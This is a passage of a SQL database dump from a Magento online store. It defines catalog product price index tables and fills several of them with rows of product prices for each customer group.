(2053, 152, 1, 5532, 2053),
(2053, 152, 1, 5538, 2053),
(2053, 156, 1, 5622, 2053),
(2053, 157, 1, 5632, 2053),
(2053, 157, 1, 5635, 2053),
(2053, 157, 1, 5638, 2053),
(2054, 99, 1, 4, 2054),
(2055, 99, 1, 4, 2055),
(2057, 99, 1, 4, 2057),
(2058, 99, 1, 4, 2058),
(2059, 99, 1, 4, 2059),
(2060, 99, 1, 4, 2060),
(2061, 99, 1, 4, 2061),
(2062, 99, 1, 4, 2062),
(2063, 99, 1, 4, 2063),
(2064, 93, 1, 5476, 2064),
(2064, 99, 1, 4, 2064),
(2064, 145, 1, 5518, 2064),
(2064, 146, 1, 0, 2064),
(2064, 147, 1, 0, 2064),
(2064, 148, 1, 0, 2064),
(2064, 149, 1, 0, 2064),
(2064, 150, 1, 0, 2064);

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_eav_tmp`
--

CREATE TABLE `catalog_product_index_eav_tmp` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Attribute ID',
  `store_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Store ID',
  `value` int(10) UNSIGNED NOT NULL COMMENT 'Value',
  `source_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Original entity ID for attribute value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product EAV Indexer Temp Table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_price`
--

CREATE TABLE `catalog_product_index_price` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `customer_group_id` int(10) UNSIGNED NOT NULL COMMENT 'Customer Group ID',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `tax_class_id` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Tax Class ID',
  `price` decimal(20,6) DEFAULT NULL COMMENT 'Price',
  `final_price` decimal(20,6) DEFAULT NULL COMMENT 'Final Price',
  `min_price` decimal(20,6) DEFAULT NULL COMMENT 'Min Price',
  `max_price` decimal(20,6) DEFAULT NULL COMMENT 'Max Price',
  `tier_price` decimal(20,6) DEFAULT NULL COMMENT 'Tier Price'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Price Index Table';

--
-- Dumping data for table `catalog_product_index_price`
--

INSERT INTO `catalog_product_index_price` (`entity_id`, `customer_group_id`, `website_id`, `tax_class_id`, `price`, `final_price`, `min_price`, `max_price`, `tier_price`) VALUES
(1776, 0, 1, 2, 39.000000, 39.000000, 39.000000, 39.000000, NULL),
(1776, 1, 1, 2, 39.000000, 39.000000, 39.000000, 39.000000, NULL),
(1776, 2, 1, 2, 39.000000, 39.000000, 39.000000, 39.000000, NULL),
(1776, 3, 1, 2, 39.000000, 39.000000, 39.000000, 39.000000, NULL),
(2052, 0, 1, 2, 45.000000, 45.000000, 45.000000, 45.000000, NULL),
(2052, 1, 1, 2, 45.000000, 45.000000, 45.000000, 45.000000, NULL),
(2052, 2, 1, 2, 45.000000, 45.000000, 45.000000, 45.000000, NULL),
(2052, 3, 1, 2, 45.000000, 45.000000, 45.000000, 45.000000, NULL),
(2053, 0, 1, 2, 45.000000, 45.000000, 45.000000, 45.000000, NULL),
(2053, 1, 1, 2, 45.000000, 45.000000, 45.000000, 45.000000, NULL),
(2053, 2, 1, 2, 45.000000, 45.000000, 45.000000, 45.000000, NULL),
(2053, 3, 1, 2, 45.000000, 45.000000, 45.000000, 45.000000, NULL),
(2054, 0, 1, 2, 32.000000, 32.000000, 32.000000, 32.000000, NULL),
(2054, 1, 1, 2, 32.000000, 32.000000, 32.000000, 32.000000, NULL),
(2054, 2, 1, 2, 32.000000, 32.000000, 32.000000, 32.000000, NULL),
(2054, 3, 1, 2, 32.000000, 32.000000, 32.000000, 32.000000, NULL),
(2055, 0, 1, 2, 321.000000, 321.000000, 321.000000, 321.000000, NULL),
(2055, 1, 1, 2, 321.000000, 321.000000, 321.000000, 321.000000, NULL),
(2055, 2, 1, 2, 321.000000, 321.000000, 321.000000, 321.000000, NULL),
(2055, 3, 1, 2, 321.000000, 321.000000, 321.000000, 321.000000, NULL),
(2058, 0, 1, 2, 321.000000, 321.000000, 321.000000, 321.000000, NULL),
(2058, 1, 1, 2, 321.000000, 321.000000, 321.000000, 321.000000, NULL),
(2058, 2, 1, 2, 321.000000, 321.000000, 321.000000, 321.000000, NULL),
(2058, 3, 1, 2, 321.000000, 321.000000, 321.000000, 321.000000, NULL),
(2059, 0, 1, 2, 422.000000, 422.000000, 422.000000, 422.000000, NULL),
(2059, 1, 1, 2, 422.000000, 422.000000, 422.000000, 422.000000, NULL),
(2059, 2, 1, 2, 422.000000, 422.000000, 422.000000, 422.000000, NULL),
(2059, 3, 1, 2, 422.000000, 422.000000, 422.000000, 422.000000, NULL),
(2060, 0, 1, 2, 421.000000, 421.000000, 421.000000, 421.000000, NULL),
(2060, 1, 1, 2, 421.000000, 421.000000, 421.000000, 421.000000, NULL),
(2060, 2, 1, 2, 421.000000, 421.000000, 421.000000, 421.000000, NULL),
(2060, 3, 1, 2, 421.000000, 421.000000, 421.000000, 421.000000, NULL),
(2061, 0, 1, 2, 54.000000, 54.000000, 54.000000, 54.000000, NULL),
(2061, 1, 1, 2, 54.000000, 54.000000, 54.000000, 54.000000, NULL),
(2061, 2, 1, 2, 54.000000, 54.000000, 54.000000, 54.000000, NULL),
(2061, 3, 1, 2, 54.000000, 54.000000, 54.000000, 54.000000, NULL),
(2062, 0, 1, 2, 234.000000, 234.000000, 234.000000, 234.000000, NULL),
(2062, 1, 1, 2, 234.000000, 234.000000, 234.000000, 234.000000, NULL),
(2062, 2, 1, 2, 234.000000, 234.000000, 234.000000, 234.000000, NULL),
(2062, 3, 1, 2, 234.000000, 234.000000, 234.000000, 234.000000, NULL),
(2063, 0, 1, 2, 643.000000, 643.000000, 643.000000, 643.000000, NULL),
(2063, 1, 1, 2, 643.000000, 643.000000, 643.000000, 643.000000, NULL),
(2063, 2, 1, 2, 643.000000, 643.000000, 643.000000, 643.000000, NULL),
(2063, 3, 1, 2, 643.000000, 643.000000, 643.000000, 643.000000, NULL),
(2064, 0, 1, 2, 200.000000, 111.000000, 111.000000, 111.000000, NULL),
(2064, 1, 1, 2, 200.000000, 111.000000, 111.000000, 111.000000, NULL),
(2064, 2, 1, 2, 200.000000, 111.000000, 111.000000, 111.000000, NULL),
(2064, 3, 1, 2, 200.000000, 111.000000, 111.000000, 111.000000, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_price_bundle_idx`
--

CREATE TABLE `catalog_product_index_price_bundle_idx` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `customer_group_id` int(11) NOT NULL,
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `tax_class_id` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Tax Class ID',
  `price_type` smallint(5) UNSIGNED NOT NULL COMMENT 'Price Type',
  `special_price` decimal(20,6) DEFAULT NULL COMMENT 'Special Price',
  `tier_percent` decimal(20,6) DEFAULT NULL COMMENT 'Tier Percent',
  `orig_price` decimal(20,6) DEFAULT NULL COMMENT 'Orig Price',
  `price` decimal(20,6) DEFAULT NULL COMMENT 'Price',
  `min_price` decimal(20,6) DEFAULT NULL COMMENT 'Min Price',
  `max_price` decimal(20,6) DEFAULT NULL COMMENT 'Max Price',
  `tier_price` decimal(20,6) DEFAULT NULL COMMENT 'Tier Price',
  `base_tier` decimal(20,6) DEFAULT NULL COMMENT 'Base Tier'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Index Price Bundle Idx';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_price_bundle_opt_idx`
--

CREATE TABLE `catalog_product_index_price_bundle_opt_idx` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `customer_group_id` int(11) NOT NULL,
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `option_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Option ID',
  `min_price` decimal(20,6) DEFAULT NULL COMMENT 'Min Price',
  `alt_price` decimal(20,6) DEFAULT NULL COMMENT 'Alt Price',
  `max_price` decimal(20,6) DEFAULT NULL COMMENT 'Max Price',
  `tier_price` decimal(20,6) DEFAULT NULL COMMENT 'Tier Price',
  `alt_tier_price` decimal(20,6) DEFAULT NULL COMMENT 'Alt Tier Price'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Index Price Bundle Opt Idx';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_price_bundle_opt_tmp`
--

CREATE TABLE `catalog_product_index_price_bundle_opt_tmp` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `customer_group_id` int(11) NOT NULL,
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `option_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Option ID',
  `min_price` decimal(20,6) DEFAULT NULL COMMENT 'Min Price',
  `alt_price` decimal(20,6) DEFAULT NULL COMMENT 'Alt Price',
  `max_price` decimal(20,6) DEFAULT NULL COMMENT 'Max Price',
  `tier_price` decimal(20,6) DEFAULT NULL COMMENT 'Tier Price',
  `alt_tier_price` decimal(20,6) DEFAULT NULL COMMENT 'Alt Tier Price'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Index Price Bundle Opt Tmp';

--
-- Dumping data for table `catalog_product_index_price_bundle_opt_tmp`
--

INSERT INTO `catalog_product_index_price_bundle_opt_tmp` (`entity_id`, `customer_group_id`, `website_id`, `option_id`, `min_price`, `alt_price`, `max_price`, `tier_price`, `alt_tier_price`) VALUES
(53, 0, 1, 1, 23.000000, 23.000000, 32.000000, NULL, NULL),
(53, 0, 1, 2, 5.000000, 5.000000, 5.000000, NULL, NULL),
(53, 0, 1, 3, 14.000000, 14.000000, 21.000000, NULL, NULL),
(53, 0, 1, 4, 19.000000, 19.000000, 19.000000, NULL, NULL),
(53, 1, 1, 1, 23.000000, 23.000000, 32.000000, NULL, NULL),
(53, 1, 1, 2, 5.000000, 5.000000, 5.000000, NULL, NULL),
(53, 1, 1, 3, 14.000000, 14.000000, 21.000000, NULL, NULL),
(53, 1, 1, 4, 19.000000, 19.000000, 19.000000, NULL, NULL),
(53, 2, 1, 1, 23.000000, 23.000000, 32.000000, NULL, NULL),
(53, 2, 1, 2, 5.000000, 5.000000, 5.000000, NULL, NULL),
(53, 2, 1, 3, 14.000000, 14.000000, 21.000000, NULL, NULL),
(53, 2, 1, 4, 19.000000, 19.000000, 19.000000, NULL, NULL),
(53, 3, 1, 1, 23.000000, 23.000000, 32.000000, NULL, NULL),
(53, 3, 1, 2, 5.000000, 5.000000, 5.000000, NULL, NULL),
(53, 3, 1, 3, 14.000000, 14.000000, 21.000000, NULL, NULL),
(53, 3, 1, 4, 19.000000, 19.000000, 19.000000, NULL, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_price_bundle_sel_idx`
--

CREATE TABLE `catalog_product_index_price_bundle_sel_idx` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `customer_group_id` int(11) NOT NULL,
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `option_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Option ID',
  `selection_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Selection ID',
  `group_type` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Group Type',
  `is_required` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Is Required',
  `price` decimal(20,6) DEFAULT NULL COMMENT 'Price',
  `tier_price` decimal(20,6) DEFAULT NULL COMMENT 'Tier Price'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Index Price Bundle Sel Idx';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_price_bundle_sel_tmp`
--

CREATE TABLE `catalog_product_index_price_bundle_sel_tmp` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `customer_group_id` int(11) NOT NULL,
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `option_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Option ID',
  `selection_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Selection ID',
  `group_type` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Group Type',
  `is_required` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Is Required',
  `price` decimal(20,6) DEFAULT NULL COMMENT 'Price',
  `tier_price` decimal(20,6) DEFAULT NULL COMMENT 'Tier Price'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Index Price Bundle Sel Tmp';

--
-- Dumping data for table `catalog_product_index_price_bundle_sel_tmp`
--

INSERT INTO `catalog_product_index_price_bundle_sel_tmp` (`entity_id`, `customer_group_id`, `website_id`, `option_id`, `selection_id`, `group_type`, `is_required`, `price`, `tier_price`) VALUES
(53, 0, 1, 1, 1, 0, 1, 23.000000, NULL),
(53, 0, 1, 1, 2, 0, 1, 27.000000, NULL),
(53, 0, 1, 1, 3, 0, 1, 32.000000, NULL),
(53, 0, 1, 2, 4, 0, 1, 5.000000, NULL),
(53, 0, 1, 3, 5, 0, 1, 14.000000, NULL),
(53, 0, 1, 3, 6, 0, 1, 17.000000, NULL),
(53, 0, 1, 3, 7, 0, 1, 21.000000, NULL),
(53, 0, 1, 4, 8, 0, 1, 19.000000, NULL),
(53, 1, 1, 1, 1, 0, 1, 23.000000, NULL),
(53, 1, 1, 1, 2, 0, 1, 27.000000, NULL),
(53, 1, 1, 1, 3, 0, 1, 32.000000, NULL),
(53, 1, 1, 2, 4, 0, 1, 5.000000, NULL),
(53, 1, 1, 3, 5, 0, 1, 14.000000, NULL),
(53, 1, 1, 3, 6, 0, 1, 17.000000, NULL),
(53, 1, 1, 3, 7, 0, 1, 21.000000, NULL),
(53, 1, 1, 4, 8, 0, 1, 19.000000, NULL),
(53, 2, 1, 1, 1, 0, 1, 23.000000, NULL),
(53, 2, 1, 1, 2, 0, 1, 27.000000, NULL),
(53, 2, 1, 1, 3, 0, 1, 32.000000, NULL),
(53, 2, 1, 2, 4, 0, 1, 5.000000, NULL),
(53, 2, 1, 3, 5, 0, 1, 14.000000, NULL),
(53, 2, 1, 3, 6, 0, 1, 17.000000, NULL),
(53, 2, 1, 3, 7, 0, 1, 21.000000, NULL),
(53, 2, 1, 4, 8, 0, 1, 19.000000, NULL),
(53, 3, 1, 1, 1, 0, 1, 23.000000, NULL),
(53, 3, 1, 1, 2, 0, 1, 27.000000, NULL),
(53, 3, 1, 1, 3, 0, 1, 32.000000, NULL),
(53, 3, 1, 2, 4, 0, 1, 5.000000, NULL),
(53, 3, 1, 3, 5, 0, 1, 14.000000, NULL),
(53, 3, 1, 3, 6, 0, 1, 17.000000, NULL),
(53, 3, 1, 3, 7, 0, 1, 21.000000, NULL),
(53, 3, 1, 4, 8, 0, 1, 19.000000, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_price_bundle_tmp`
--

CREATE TABLE `catalog_product_index_price_bundle_tmp` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `customer_group_id` int(11) NOT NULL,
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `tax_class_id` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Tax Class ID',
  `price_type` smallint(5) UNSIGNED NOT NULL COMMENT 'Price Type',
  `special_price` decimal(20,6) DEFAULT NULL COMMENT 'Special Price',
  `tier_percent` decimal(20,6) DEFAULT NULL COMMENT 'Tier Percent',
  `orig_price` decimal(20,6) DEFAULT NULL COMMENT 'Orig Price',
  `price` decimal(20,6) DEFAULT NULL COMMENT 'Price',
  `min_price` decimal(20,6) DEFAULT NULL COMMENT 'Min Price',
  `max_price` decimal(20,6) DEFAULT NULL COMMENT 'Max Price',
  `tier_price` decimal(20,6) DEFAULT NULL COMMENT 'Tier Price',
  `base_tier` decimal(20,6) DEFAULT NULL COMMENT 'Base Tier'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Index Price Bundle Tmp';

--
-- Dumping data for table `catalog_product_index_price_bundle_tmp`
--

INSERT INTO `catalog_product_index_price_bundle_tmp` (`entity_id`, `customer_group_id`, `website_id`, `tax_class_id`, `price_type`, `special_price`, `tier_percent`, `orig_price`, `price`, `min_price`, `max_price`, `tier_price`, `base_tier`) VALUES
(53, 0, 1, 0, 0, 0.000000, NULL, 0.000000, 0.000000, 0.000000, 0.000000, NULL, NULL),
(53, 1, 1, 0, 0, 0.000000, NULL, 0.000000, 0.000000, 0.000000, 0.000000, NULL, NULL),
(53, 2, 1, 0, 0, 0.000000, NULL, 0.000000, 0.000000, 0.000000, 0.000000, NULL, NULL),
(53, 3, 1, 0, 0, 0.000000, NULL, 0.000000, 0.000000, 0.000000, 0.000000, NULL, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_price_cfg_opt_agr_idx`
--

CREATE TABLE `catalog_product_index_price_cfg_opt_agr_idx` (
  `parent_id` int(10) UNSIGNED NOT NULL COMMENT 'Parent ID',
  `child_id` int(10) UNSIGNED NOT NULL COMMENT 'Child ID',
  `customer_group_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Customer Group ID',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `price` decimal(20,6) DEFAULT NULL COMMENT 'Price',
  `tier_price` decimal(20,6) DEFAULT NULL COMMENT 'Tier Price'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Price Indexer Config Option Aggregate Index Table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_price_cfg_opt_agr_tmp`
--

CREATE TABLE `catalog_product_index_price_cfg_opt_agr_tmp` (
  `parent_id` int(10) UNSIGNED NOT NULL COMMENT 'Parent ID',
  `child_id` int(10) UNSIGNED NOT NULL COMMENT 'Child ID',
  `customer_group_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Customer Group ID',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `price` decimal(20,6) DEFAULT NULL COMMENT 'Price',
  `tier_price` decimal(20,6) DEFAULT NULL COMMENT 'Tier Price'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Price Indexer Config Option Aggregate Temp Table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_price_cfg_opt_idx`
--

CREATE TABLE `catalog_product_index_price_cfg_opt_idx` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `customer_group_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Customer Group ID',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `min_price` decimal(20,6) DEFAULT NULL COMMENT 'Min Price',
  `max_price` decimal(20,6) DEFAULT NULL COMMENT 'Max Price',
  `tier_price` decimal(20,6) DEFAULT NULL COMMENT 'Tier Price'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Price Indexer Config Option Index Table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_price_cfg_opt_tmp`
--

CREATE TABLE `catalog_product_index_price_cfg_opt_tmp` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `customer_group_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Customer Group ID',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `min_price` decimal(20,6) DEFAULT NULL COMMENT 'Min Price',
  `max_price` decimal(20,6) DEFAULT NULL COMMENT 'Max Price',
  `tier_price` decimal(20,6) DEFAULT NULL COMMENT 'Tier Price'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Price Indexer Config Option Temp Table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_price_downlod_idx`
--

CREATE TABLE `catalog_product_index_price_downlod_idx` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `customer_group_id` int(11) NOT NULL,
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `min_price` decimal(20,6) NOT NULL DEFAULT 0.000000 COMMENT 'Minimum price',
  `max_price` decimal(20,6) NOT NULL DEFAULT 0.000000 COMMENT 'Maximum price'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Indexer Table for price of downloadable products';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_price_downlod_tmp`
--

CREATE TABLE `catalog_product_index_price_downlod_tmp` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `customer_group_id` int(11) NOT NULL,
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `min_price` decimal(20,6) NOT NULL DEFAULT 0.000000 COMMENT 'Minimum price',
  `max_price` decimal(20,6) NOT NULL DEFAULT 0.000000 COMMENT 'Maximum price'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Temporary Indexer Table for price of downloadable products';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_price_final_idx`
--

CREATE TABLE `catalog_product_index_price_final_idx` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `customer_group_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Customer Group ID',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `tax_class_id` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Tax Class ID',
  `orig_price` decimal(20,6) DEFAULT NULL COMMENT 'Original Price',
  `price` decimal(20,6) DEFAULT NULL COMMENT 'Price',
  `min_price` decimal(20,6) DEFAULT NULL COMMENT 'Min Price',
  `max_price` decimal(20,6) DEFAULT NULL COMMENT 'Max Price',
  `tier_price` decimal(20,6) DEFAULT NULL COMMENT 'Tier Price',
  `base_tier` decimal(20,6) DEFAULT NULL COMMENT 'Base Tier'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Price Indexer Final Index Table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_price_final_tmp`
--

CREATE TABLE `catalog_product_index_price_final_tmp` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `customer_group_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Customer Group ID',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `tax_class_id` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Tax Class ID',
  `orig_price` decimal(20,6) DEFAULT NULL COMMENT 'Original Price',
  `price` decimal(20,6) DEFAULT NULL COMMENT 'Price',
  `min_price` decimal(20,6) DEFAULT NULL COMMENT 'Min Price',
  `max_price` decimal(20,6) DEFAULT NULL COMMENT 'Max Price',
  `tier_price` decimal(20,6) DEFAULT NULL COMMENT 'Tier Price',
  `base_tier` decimal(20,6) DEFAULT NULL COMMENT 'Base Tier'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Price Indexer Final Temp Table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_price_idx`
--

CREATE TABLE `catalog_product_index_price_idx` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `customer_group_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Customer Group ID',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `tax_class_id` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Tax Class ID',
  `price` decimal(20,6) DEFAULT NULL COMMENT 'Price',
  `final_price` decimal(20,6) DEFAULT NULL COMMENT 'Final Price',
  `min_price` decimal(20,6) DEFAULT NULL COMMENT 'Min Price',
  `max_price` decimal(20,6) DEFAULT NULL COMMENT 'Max Price',
  `tier_price` decimal(20,6) DEFAULT NULL COMMENT 'Tier Price'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Price Indexer Index Table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_price_opt_agr_idx`
--

CREATE TABLE `catalog_product_index_price_opt_agr_idx` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `customer_group_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Customer Group ID',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `option_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Option ID',
  `min_price` decimal(20,6) DEFAULT NULL COMMENT 'Min Price',
  `max_price` decimal(20,6) DEFAULT NULL COMMENT 'Max Price',
  `tier_price` decimal(20,6) DEFAULT NULL COMMENT 'Tier Price'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Price Indexer Option Aggregate Index Table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_price_opt_agr_tmp`
--

CREATE TABLE `catalog_product_index_price_opt_agr_tmp` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `customer_group_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Customer Group ID',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `option_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Option ID',
  `min_price` decimal(20,6) DEFAULT NULL COMMENT 'Min Price',
  `max_price` decimal(20,6) DEFAULT NULL COMMENT 'Max Price',
  `tier_price` decimal(20,6) DEFAULT NULL COMMENT 'Tier Price'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Price Indexer Option Aggregate Temp Table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_price_opt_idx`
--

CREATE TABLE `catalog_product_index_price_opt_idx` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `customer_group_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Customer Group ID',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `min_price` decimal(20,6) DEFAULT NULL COMMENT 'Min Price',
  `max_price` decimal(20,6) DEFAULT NULL COMMENT 'Max Price',
  `tier_price` decimal(20,6) DEFAULT NULL COMMENT 'Tier Price'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Price Indexer Option Index Table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_price_opt_tmp`
--

CREATE TABLE `catalog_product_index_price_opt_tmp` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `customer_group_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Customer Group ID',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `min_price` decimal(20,6) DEFAULT NULL COMMENT 'Min Price',
  `max_price` decimal(20,6) DEFAULT NULL COMMENT 'Max Price',
  `tier_price` decimal(20,6) DEFAULT NULL COMMENT 'Tier Price'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Price Indexer Option Temp Table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_price_replica`
--

CREATE TABLE `catalog_product_index_price_replica` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `customer_group_id` int(10) UNSIGNED NOT NULL COMMENT 'Customer Group ID',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `tax_class_id` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Tax Class ID',
  `price` decimal(20,6) DEFAULT NULL COMMENT 'Price',
  `final_price` decimal(20,6) DEFAULT NULL COMMENT 'Final Price',
  `min_price` decimal(20,6) DEFAULT NULL COMMENT 'Min Price',
  `max_price` decimal(20,6) DEFAULT NULL COMMENT 'Max Price',
  `tier_price` decimal(20,6) DEFAULT NULL COMMENT 'Tier Price'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Price Index Table';

--
-- Dumping data for table `catalog_product_index_price_replica`
--

INSERT INTO `catalog_product_index_price_replica` (`entity_id`, `customer_group_id`, `website_id`, `tax_class_id`, `price`, `final_price`, `min_price`, `max_price`, `tier_price`) VALUES
(1776, 0, 1, 2, 39.000000, 39.000000, 39.000000, 39.000000, NULL),
(1776, 1, 1, 2, 39.000000, 39.000000, 39.000000, 39.000000, NULL),
(1776, 2, 1, 2, 39.000000, 39.000000, 39.000000, 39.000000, NULL),
(1776, 3, 1, 2, 39.000000, 39.000000, 39.000000, 39.000000, NULL),
(2052, 0, 1, 2, 45.000000, 45.000000, 45.000000, 45.000000, NULL),
(2052, 1, 1, 2, 45.000000, 45.000000, 45.000000, 45.000000, NULL),
(2052, 2, 1, 2, 45.000000, 45.000000, 45.000000, 45.000000, NULL),
(2052, 3, 1, 2, 45.000000, 45.000000, 45.000000, 45.000000, NULL),
(2053, 0, 1, 2, 45.000000, 45.000000, 45.000000, 45.000000, NULL),
(2053, 1, 1, 2, 45.000000, 45.000000, 45.000000, 45.000000, NULL),
(2053, 2, 1, 2, 45.000000, 45.000000, 45.000000, 45.000000, NULL),
(2053, 3, 1, 2, 45.000000, 45.000000, 45.000000, 45.000000, NULL),
